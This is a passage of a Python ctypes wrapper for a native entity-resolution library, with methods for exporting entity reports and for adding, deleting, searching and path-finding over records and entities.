raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def getExportFlagsForMaxMatchLevel(self, max_match_level, includeSingletons, includeExtraCols):
""" Converts a maximum match level into an appropriate export flag bitmask value.
Args:
max_match_level: The maximum match level to use in an export.
includeSingletons: Also include singletons.
includeExtraCols: Also include extra export output.
Return:
int: A bitmask flag representing the match-levels to include.
"""
g2ExportFlags = 0
if max_match_level == 1:
# Include resolved entities
g2ExportFlags = self.G2_EXPORT_INCLUDE_RESOLVED
elif max_match_level == 2:
# Include possibly same relationships in addition to resolved entities
g2ExportFlags = self.G2_EXPORT_INCLUDE_RESOLVED | self.G2_EXPORT_INCLUDE_POSSIBLY_SAME
elif max_match_level == 3:
# Include possibly related relationships in addition to resolved entities & possibly same
g2ExportFlags = self.G2_EXPORT_INCLUDE_RESOLVED | self.G2_EXPORT_INCLUDE_POSSIBLY_SAME | self.G2_EXPORT_INCLUDE_POSSIBLY_RELATED
elif max_match_level == 4:
# Include name-only relationships in addition to resolved entities & possibly same & possibly related
g2ExportFlags = self.G2_EXPORT_INCLUDE_RESOLVED | self.G2_EXPORT_INCLUDE_POSSIBLY_SAME | self.G2_EXPORT_INCLUDE_POSSIBLY_RELATED | self.G2_EXPORT_INCLUDE_NAME_ONLY
elif max_match_level == 5:
# Include disclosed relationships in addition to resolved entities & possibly same & possibly related & name-only
g2ExportFlags = self.G2_EXPORT_INCLUDE_RESOLVED | self.G2_EXPORT_INCLUDE_POSSIBLY_SAME | self.G2_EXPORT_INCLUDE_POSSIBLY_RELATED | self.G2_EXPORT_INCLUDE_NAME_ONLY | self.G2_EXPORT_INCLUDE_DISCLOSED
else:
g2ExportFlags = self.G2_EXPORT_INCLUDE_ALL_ENTITIES
#Add 1 to flags if we are including singletons
if includeSingletons:
g2ExportFlags = g2ExportFlags | self.G2_EXPORT_INCLUDE_ALL_ENTITIES
#Add 2 to flags if we are including extra header columns
if includeExtraCols:
g2ExportFlags = g2ExportFlags | self.G2_EXPORT_CSV_INCLUDE_FULL_DETAILS
return g2ExportFlags
def getExportHandleFromFlags(self, exportType, g2ExportFlags, colNames=None):
if exportType == 'CSV':
if colNames and isinstance(colNames, list):
colNames = ",".join(colNames)
self._lib_handle.G2_exportCSVEntityReport_V2.restype = c_void_p
self._lib_handle.G2_exportCSVEntityReport_V2.argtypes = [c_char_p, c_int]
exportHandle = self._lib_handle.G2_exportCSVEntityReport_V2(colNames.encode(), g2ExportFlags)
else:
self._lib_handle.G2_exportCSVEntityReport.restype = c_void_p
self._lib_handle.G2_exportCSVEntityReport.argtypes = [c_int]
exportHandle = self._lib_handle.G2_exportCSVEntityReport(g2ExportFlags)
else:
self._lib_handle.G2_exportJSONEntityReport.restype = c_void_p
self._lib_handle.G2_exportJSONEntityReport.argtypes = [c_int]
exportHandle = self._lib_handle.G2_exportJSONEntityReport(g2ExportFlags)
return exportHandle
def getExportHandle(self, exportType, max_match_level):
# type: (str, int) -> c_void_p
""" Generate a CSV or JSON export
This is used to export entity data from known entities. This function
returns an export-handle that can be read from to get the export data
in the requested format. The export-handle should be read using the "G2_fetchNext"
function, and closed when work is complete. If CSV, the first output row returned
by the export-handle contains the CSV column headers as a string. Each
following row contains the exported entity data.
Args:
exportType: CSV or JSON
max_match_level: The match-level to specify what kind of entity resolves
and relations we want to see.
1 -- "resolved" relationships
2 -- "possibly same" relationships
3 -- "possibly related" relationships
4 -- "name only" relationships *** Internal only
5 -- "disclosed" relationships
Return:
c_void_p: handle for the export
"""
g2ExportFlags = self.getExportFlagsForMaxMatchLevel(max_match_level, True, True)
if exportType == 'CSV':
self._lib_handle.G2_exportCSVEntityReport.restype = c_void_p
exportHandle = self._lib_handle.G2_exportCSVEntityReport(g2ExportFlags)
else:
self._lib_handle.G2_exportJSONEntityReport.restype = c_void_p
exportHandle = self._lib_handle.G2_exportJSONEntityReport(g2ExportFlags)
return exportHandle
def fetchExportRecord(self, exportHandle):
# type: (c_void_p) -> str
""" Fetch a record from an export
Args:
exportHandle: handle from generated export
Returns:
str: Record fetched, empty if there is no more data
"""
resultString = ""
resize_return_buffer(None,65535)
self._lib_handle.G2_fetchNext.argtypes = [c_void_p, c_char_p, c_size_t]
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
while rowData:
resultString += tls_var.buf.value.decode('utf-8')
if resultString[-1] == '\n':
resultString = resultString[0:-1]
break
else:
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
return resultString
def fetchCsvExportRecord(self, exportHandle, csvHeaders = None):
# type: (c_void_p, str) -> str
""" Fetch a CSV record from an export
Args:
exportHandle: handle from generated export
csvHeaders: CSV header record
Returns:
dict: Record fetched using the csvHeaders as the keys.
None if no more data is available.
"""
resultString = self.fetchExportRecord(exportHandle)
if resultString:
csvRecord = next(csv.DictReader([resultString], fieldnames=csvHeaders))
else:
csvRecord = None
return csvRecord
def exportCSVEntityReport(self, max_match_level, g2ExportFlags, includeSingletons, includeExtraCols):
# type: (int, int) -> str
""" Generate a CSV Entity Report
This is used to export entity data from known entities. This function
returns an export-handle that can be read from to get the export data
in CSV format. The export-handle should be read using the "G2_fetchNext"
function, and closed when work is complete. Each output row contains the
exported entity data for a single resolved entity.
Args:
max_match_level: The match-level to specify what kind of entity resolves
and relations we want to see.
1 -- "resolved" relationships
2 -- "possibly same" relationships
3 -- "possibly related" relationships
4 -- "name only" relationships *** Internal only
5 -- "disclosed" relationships
g2ExportFlags: A bit mask specifying other control flags, such as
"G2_EXPORT_INCLUDE_SINGLETONS". The default and recommended
value is "G2_EXPORT_DEFAULT_FLAGS".
includeSingletons: Also include singletons
includeExtraCols: Also include extra export output
Return:
c_void_p: handle for the export
"""
resultString = b""
fullG2ExportFlags_ = self.getExportFlagsForMaxMatchLevel(max_match_level, includeSingletons, includeExtraCols)
fullG2ExportFlags_ = fullG2ExportFlags_ | g2ExportFlags
self._lib_handle.G2_exportCSVEntityReport.restype = c_void_p
exportHandle = self._lib_handle.G2_exportCSVEntityReport(fullG2ExportFlags_)
rowCount = 0
resize_return_buffer(None,65535)
self._lib_handle.G2_fetchNext.argtypes = [c_void_p, c_char_p, c_size_t]
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
while rowData:
rowCount += 1
stringData = tls_var.buf
resultString += stringData.value
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
self._lib_handle.G2_closeExport(c_void_p(exportHandle))
return (resultString.decode('utf-8'), rowCount)
def exportCSVEntityReportV2(self, csvColumnList, max_match_level, g2ExportFlags, includeSingletons, includeExtraCols):
# type: (int, int) -> str
""" Generate a CSV Entity Report
This is used to export entity data from known entities
"""
resultString = b""
fullG2ExportFlags_ = self.getExportFlagsForMaxMatchLevel(max_match_level, includeSingletons, includeExtraCols)
fullG2ExportFlags_ = fullG2ExportFlags_ | g2ExportFlags
_csvColumnList = self.prepareStringArgument(csvColumnList)
self._lib_handle.G2_exportCSVEntityReport_V2.restype = c_void_p
self._lib_handle.G2_exportCSVEntityReport_V2.argtypes = [c_char_p, c_int]
exportHandle = self._lib_handle.G2_exportCSVEntityReport_V2(_csvColumnList,fullG2ExportFlags_)
rowCount = 0
resize_return_buffer(None,65535)
self._lib_handle.G2_fetchNext.argtypes = [c_void_p, c_char_p, c_size_t]
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
while rowData:
rowCount += 1
stringData = tls_var.buf
resultString += stringData.value
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
self._lib_handle.G2_closeExport(c_void_p(exportHandle))
return (resultString.decode('utf-8'), rowCount)
def exportJSONEntityReport(self, max_match_level, g2ExportFlags, includeSingletons, includeExtraCols):
# type: (int, int) -> str
""" Generate a JSON Entity Report
This is used to export entity data from known entities. This function
returns an export-handle that can be read from to get the export data
in JSON format. The export-handle should be read using the "G2_fetchNext"
function, and closed when work is complete. Each output row contains the
exported entity data for a single resolved entity.
Args:
max_match_level: The match-level to specify what kind of entity resolves
and relations we want to see.
1 -- "resolved" relationships
2 -- "possibly same" relationships
3 -- "possibly related" relationships
4 -- "name only" relationships
5 -- "disclosed" relationships
g2ExportFlags: A bit mask specifying other control flags, such as
"G2_EXPORT_INCLUDE_SINGLETONS". The default and recommended
value is "G2_EXPORT_DEFAULT_FLAGS".
includeSingletons: Also include singletons
includeExtraCols: Also include extra export output
Return:
c_void_p: handle for the export
"""
resultString = b""
fullG2ExportFlags_ = self.getExportFlagsForMaxMatchLevel(max_match_level, includeSingletons, includeExtraCols)
fullG2ExportFlags_ = fullG2ExportFlags_ | g2ExportFlags
self._lib_handle.G2_exportJSONEntityReport.restype = c_void_p
exportHandle = self._lib_handle.G2_exportJSONEntityReport(fullG2ExportFlags_)
rowCount = 0
resize_return_buffer(None,65535)
self._lib_handle.G2_fetchNext.argtypes = [c_void_p, c_char_p, c_size_t]
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
while rowData:
rowCount += 1
stringData = tls_var.buf
resultString += stringData.value
rowData = self._lib_handle.G2_fetchNext(c_void_p(exportHandle),tls_var.buf,sizeof(tls_var.buf))
self._lib_handle.G2_closeExport(c_void_p(exportHandle))
return (resultString.decode('utf-8'), rowCount)
def prepareStringArgument(self, stringToPrepare):
# type: (str) -> str
""" Internal processing function """
if stringToPrepare == None:
return None
#if string is unicode, transcode to utf-8 str
if type(stringToPrepare) == str:
return stringToPrepare.encode('utf-8')
#if input is bytearray, assumt utf-8 and convert to str
elif type(stringToPrepare) == bytearray:
return str(stringToPrepare)
#input is already a str
return stringToPrepare
def addRecord(self,dataSourceCode,recordId,jsonData,loadId=None):
# type: (str,str,str,str) -> int
""" Loads the JSON record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
jsonData: A JSON document containing the attribute information
for the observation.
loadID: The observation load ID for the record, can be null and will default to dataSourceCode
Return:
int: 0 on success
"""
_dataSourceCode = self.prepareStringArgument(dataSourceCode)
_loadId = self.prepareStringArgument(loadId)
_recordId = self.prepareStringArgument(recordId)
_jsonData = self.prepareStringArgument(jsonData)
resize_return_buffer(None, 65535)
ret_code = self._lib_handle.G2_addRecord(_dataSourceCode,_recordId,_jsonData,_loadId)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return ret_code
def replaceRecord(self,dataSourceCode,recordId,jsonData,loadId=None):
# type: (str,str,str,str) -> int
""" Replace the JSON record, loads if doesn't exist
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
jsonData: A JSON document containing the attribute information
for the observation.
loadID: The load ID for the record, can be null and will default to dataSourceCode
Return:
int: 0 on success
"""
_dataSourceCode = self.prepareStringArgument(dataSourceCode)
_loadId = self.prepareStringArgument(loadId)
_recordId = self.prepareStringArgument(recordId)
_jsonData = self.prepareStringArgument(jsonData)
resize_return_buffer(None, 65535)
ret_code = self._lib_handle.G2_replaceRecord(_dataSourceCode,_recordId,_jsonData,_loadId)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return ret_code
def deleteRecord(self,dataSourceCode,recordId,loadId=None):
# type: (str,str,str) -> int
""" Delete the record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
loadID: The load ID for the record, can be null and will default to dataSourceCode
Return:
int: 0 on success
"""
_dataSourceCode = self.prepareStringArgument(dataSourceCode)
_loadId = self.prepareStringArgument(loadId)
_recordId = self.prepareStringArgument(recordId)
resize_return_buffer(None, 65535)
ret_code = self._lib_handle.G2_deleteRecord(_dataSourceCode,_recordId,_loadId)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return ret_code
def reevaluateRecord(self,dataSourceCode,recordId,flags):
# type: (str,str,int) -> int
""" Reevaluate the JSON record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
flags: Bitwise control flags
Return:
int: 0 on success
"""
_dataSourceCode = self.prepareStringArgument(dataSourceCode)
_recordId = self.prepareStringArgument(recordId)
resize_return_buffer(None, 65535)
ret_code = self._lib_handle.G2_reevaluateRecord(_dataSourceCode,_recordId,flags)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return ret_code
def reevaluateEntity(self,entityID,flags):
# type: (int,int) -> int
""" Reevaluate the JSON record
Args:
entityID: The entity ID to reevaluate.
flags: Bitwise control flags
Return:
int: 0 on success
"""
resize_return_buffer(None, 65535)
ret_code = self._lib_handle.G2_reevaluateEntity(entityID,flags)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return ret_code
def searchByAttributes(self,jsonData):
# type: (str) -> str
""" Find records matching the provided attributes
Args:
jsonData: A JSON document containing the attribute information to search.
Return:
str: JSON document with results
"""
_jsonData = self.prepareStringArgument(jsonData)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_searchByAttributes.argtypes = [c_char_p, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_searchByAttributes(_jsonData,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return tls_var.buf.value.decode('utf-8')
def searchByAttributesV2(self,jsonData,flags):
# type: (str) -> str
""" Find records matching the provided attributes
Args:
jsonData: A JSON document containing the attribute information to search.
flags: control flags.
Return:
str: JSON document with results
"""
_jsonData = self.prepareStringArgument(jsonData)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_searchByAttributes_V2.restype = c_int
self._lib_handle.G2_searchByAttributes_V2.argtypes = [c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_searchByAttributes_V2(_jsonData,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return tls_var.buf.value.decode('utf-8')
def findPathByEntityID(self,startEntityID,endEntityID,maxDegree):
# type: (int) -> str
""" Find a path between two entities in the system.
Args:
startEntityID: The entity ID you want to find the path from
endEntityID: The entity ID you want to find the path to
maxDegree: The maximum path length to search for
Return:
str: JSON document with results
"""
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathByEntityID.restype = c_int
self._lib_handle.G2_findPathByEntityID.argtypes = [c_longlong, c_longlong, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathByEntityID(startEntityID,endEntityID,maxDegree,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return tls_var.buf.value.decode('utf-8')
def findPathByEntityIDV2(self,startEntityID,endEntityID,maxDegree,flags):
# type: (int) -> str
""" Find a path between two entities in the system.
Args:
startEntityID: The entity ID you want to find the path from
endEntityID: The entity ID you want to find the path to
maxDegree: The maximum path length to search for
flags: control flags.
Return:
str: JSON document with results
"""
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathByEntityID_V2.restype = c_int
self._lib_handle.G2_findPathByEntityID_V2.argtypes = [c_longlong, c_longlong, c_int, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathByEntityID_V2(startEntityID,endEntityID,maxDegree,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return tls_var.buf.value.decode('utf-8')
def findNetworkByEntityID(self,entityList,maxDegree,buildOutDegree,maxEntities):
# type: (int) -> str
""" Find a network between entities in the system.
Args:
entityList: The entities to search for the network of
maxDegree: The maximum path length to search for between entities
buildOutDegree: The number of degrees to build out the surrounding network
maxEntities: The maximum number of entities to include in the result
Return:
str: JSON document with results
"""
_entityList = self.prepareStringArgument(entityList)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findNetworkByEntityID.restype = c_int
self._lib_handle.G2_findNetworkByEntityID.argtypes = [c_char_p, c_int, c_int, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findNetworkByEntityID(_entityList,maxDegree,buildOutDegree,maxEntities,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return tls_var.buf.value.decode('utf-8')
def findNetworkByEntityIDV2(self,entityList,maxDegree,buildOutDegree,maxEntities,flags):
# type: (int) -> str
""" Find a network between entities in the system.
Args:
entityList: The entities to search for the network of
maxDegree: The maximum path length to search for between entities
buildOutDegree: The number of degrees to build out the surrounding network
maxEntities: The maximum number of entities to include in the result
flags: control flags.
Return:
str: JSON document with results
"""
_entityList = self.prepareStringArgument(entityList)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findNetworkByEntityID_V2.restype = c_int
self._lib_handle.G2_findNetworkByEntityID_V2.argtypes = [c_char_p, c_int, c_int, c_int, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findNetworkByEntityID_V2(_entityList,maxDegree,buildOutDegree,maxEntities,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return tls_var.buf.value.decode('utf-8')
def findPathByRecordID(self,startDsrcCode,startRecordId,endDsrcCode,endRecordId,maxDegree):
# type: (str,str) -> str
""" Find a path between two records in the system.
Args:
startDataSourceCode: The data source for the record you want to find the path from
startRecordID: The ID for the record you want to find the path from
endDataSourceCode: The data source for the record you want to find the path to
endRecordID: The ID for the record you want to find the path to
maxDegree: The maximum path length to search for
Return:
str: JSON document with results
"""
_startDsrcCode = self.prepareStringArgument(startDsrcCode)
_startRecordId = self.prepareStringArgument(startRecordId)
_endDsrcCode = self.prepareStringArgument(endDsrcCode)
_endRecordId = self.prepareStringArgument(endRecordId)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathByRecordID.restype = c_int
self._lib_handle.G2_findPathByRecordID.argtypes = [c_char_p, c_char_p, c_char_p, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathByRecordID(_startDsrcCode,_startRecordId,_endDsrcCode,_endRecordId,maxDegree,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def findPathByRecordIDV2(self,startDsrcCode,startRecordId,endDsrcCode,endRecordId,maxDegree,flags):
# type: (str,str) -> str
""" Find a path between two records in the system.
Args:
startDataSourceCode: The data source for the record you want to find the path from
startRecordID: The ID for the record you want to find the path from
endDataSourceCode: The data source for the record you want to find the path to
endRecordID: The ID for the record you want to find the path to
maxDegree: The maximum path length to search for
flags: control flags.
Return:
str: JSON document with results
"""
_startDsrcCode = self.prepareStringArgument(startDsrcCode)
_startRecordId = self.prepareStringArgument(startRecordId)
_endDsrcCode = self.prepareStringArgument(endDsrcCode)
_endRecordId = self.prepareStringArgument(endRecordId)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathByRecordID_V2.restype = c_int
self._lib_handle.G2_findPathByRecordID_V2.argtypes = [c_char_p, c_char_p, c_char_p, c_char_p, c_int, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathByRecordID_V2(_startDsrcCode,_startRecordId,_endDsrcCode,_endRecordId,maxDegree,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def findNetworkByRecordID(self,recordList,maxDegree,buildOutDegree,maxEntities):
# type: (str,str) -> str
""" Find a network between entities in the system.
Args:
recordList: The records to search for the network of
maxDegree: The maximum path length to search for between entities
buildOutDegree: The number of degrees to build out the surrounding network
maxEntities: The maximum number of entities to include in the result
Return:
str: JSON document with results
"""
_recordList = self.prepareStringArgument(recordList)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findNetworkByRecordID.restype = c_int
self._lib_handle.G2_findNetworkByRecordID.argtypes = [c_char_p, c_int, c_int, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findNetworkByRecordID(_recordList,maxDegree,buildOutDegree,maxEntities,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def findNetworkByRecordIDV2(self,recordList,maxDegree,buildOutDegree,maxEntities,flags):
# type: (str,str) -> str
""" Find a network between entities in the system.
Args:
recordList: The records to search for the network of
maxDegree: The maximum path length to search for between entities
buildOutDegree: The number of degrees to build out the surrounding network
maxEntities: The maximum number of entities to include in the result
flags: control flags.
Return:
str: JSON document with results
"""
_recordList = self.prepareStringArgument(recordList)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findNetworkByRecordID_V2.restype = c_int
self._lib_handle.G2_findNetworkByRecordID_V2.argtypes = [c_char_p, c_int, c_int, c_int, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findNetworkByRecordID_V2(_recordList,maxDegree,buildOutDegree,maxEntities,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def findPathExcludingByEntityID(self,startEntityID,endEntityID,maxDegree,excludedEntities,flags):
# type: (int) -> str
""" Find a path between two entities in the system.
Args:
startEntityID: The entity ID you want to find the path from
endEntityID: The entity ID you want to find the path to
maxDegree: The maximum path length to search for
excludedEntities: JSON document containing entities to exclude
flags: control flags
Return:
str: JSON document with results
"""
_excludedEntities = self.prepareStringArgument(excludedEntities)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathExcludingByEntityID.restype = c_int
self._lib_handle.G2_findPathExcludingByEntityID.argtypes = [c_longlong, c_longlong, c_int, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathExcludingByEntityID(startEntityID,endEntityID,maxDegree,_excludedEntities,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return tls_var.buf.value.decode('utf-8')
def findPathIncludingSourceByEntityID(self,startEntityID,endEntityID,maxDegree,excludedEntities,requiredDsrcs,flags):
# type: (int) -> str
""" Find a path between two entities in the system.
Args:
startEntityID: The entity ID you want to find the path from
endEntityID: The entity ID you want to find the path to
maxDegree: The maximum path length to search for
excludedEntities: JSON document containing entities to exclude
requiredDsrcs: JSON document containing data sources to require
flags: control flags
Return:
str: JSON document with results
"""
_excludedEntities = self.prepareStringArgument(excludedEntities)
_requiredDsrcs = self.prepareStringArgument(requiredDsrcs)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathIncludingSourceByEntityID.restype = c_int
self._lib_handle.G2_findPathIncludingSourceByEntityID.argtypes = [c_longlong, c_longlong, c_int, c_char_p, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathIncludingSourceByEntityID(startEntityID,endEntityID,maxDegree,_excludedEntities,_requiredDsrcs,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return tls_var.buf.value.decode('utf-8')
def findPathExcludingByRecordID(self,startDsrcCode,startRecordId,endDsrcCode,endRecordId,maxDegree,excludedEntities,flags):
# type: (str,str) -> str
""" Find a path between two records in the system.
Args:
startDataSourceCode: The data source for the record you want to find the path from
startRecordID: The ID for the record you want to find the path from
endDataSourceCode: The data source for the record you want to find the path to
endRecordID: The ID for the record you want to find the path to
maxDegree: The maximum path length to search for
excludedEntities: JSON document containing entities to exclude
flags: control flags
Return:
str: JSON document with results
"""
_startDsrcCode = self.prepareStringArgument(startDsrcCode)
_startRecordId = self.prepareStringArgument(startRecordId)
_endDsrcCode = self.prepareStringArgument(endDsrcCode)
_endRecordId = self.prepareStringArgument(endRecordId)
_excludedEntities = self.prepareStringArgument(excludedEntities)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathExcludingByRecordID.restype = c_int
self._lib_handle.G2_findPathExcludingByRecordID.argtypes = [c_char_p, c_char_p, c_char_p, c_char_p, c_int, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathExcludingByRecordID(_startDsrcCode,_startRecordId,_endDsrcCode,_endRecordId,maxDegree,
_excludedEntities,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def findPathIncludingSourceByRecordID(self,startDsrcCode,startRecordId,endDsrcCode,endRecordId,maxDegree,excludedEntities,requiredDsrcs,flags):
# type: (str,str) -> str
""" Find a path between two records in the system.
Args:
startDataSourceCode: The data source for the record you want to find the path from
startRecordID: The ID for the record you want to find the path from
endDataSourceCode: The data source for the record you want to find the path to
endRecordID: The ID for the record you want to find the path to
maxDegree: The maximum path length to search for
excludedEntities: JSON document containing entities to exclude
requiredDsrcs: JSON document containing data sources to require
flags: control flags
Return:
str: JSON document with results
"""
_startDsrcCode = self.prepareStringArgument(startDsrcCode)
_startRecordId = self.prepareStringArgument(startRecordId)
_endDsrcCode = self.prepareStringArgument(endDsrcCode)
